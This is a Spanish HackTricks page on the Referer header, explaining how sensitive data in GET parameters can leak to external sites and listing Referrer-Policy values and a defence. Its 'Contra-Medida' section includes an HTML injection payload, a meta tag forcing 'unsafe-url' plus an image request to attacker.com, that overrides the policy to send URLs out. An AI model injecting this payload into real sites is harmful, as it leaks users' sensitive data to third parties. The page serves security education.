2.9 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
-
Descubre The PEASS Family, nuestra colección exclusiva de NFTs
-
Consigue la oficial PEASS & HackTricks swag
-
Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
-
Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.
Encabezados de referencia y política
Referrer es el encabezado utilizado por los navegadores para indicar cuál fue la página anterior visitada.
Fuga de información sensible
Si en algún momento dentro de una página web se encuentra información sensible en los parámetros de una solicitud GET, si la página contiene enlaces a fuentes externas o si un atacante es capaz de hacer/sugerir (ingeniería social) que el usuario visite una URL controlada por el atacante, podría ser capaz de extraer la información sensible dentro de la última solicitud GET.
Mitigación
Puede hacer que el navegador siga una política de referencia que podría evitar que la información sensible se envíe a otras aplicaciones web:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Contra-Medida
Se puede anular esta regla utilizando una etiqueta meta de HTML (el atacante necesita explotar una inyección de HTML):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Defensa
Nunca coloque datos sensibles dentro de los parámetros GET o en las rutas de la URL.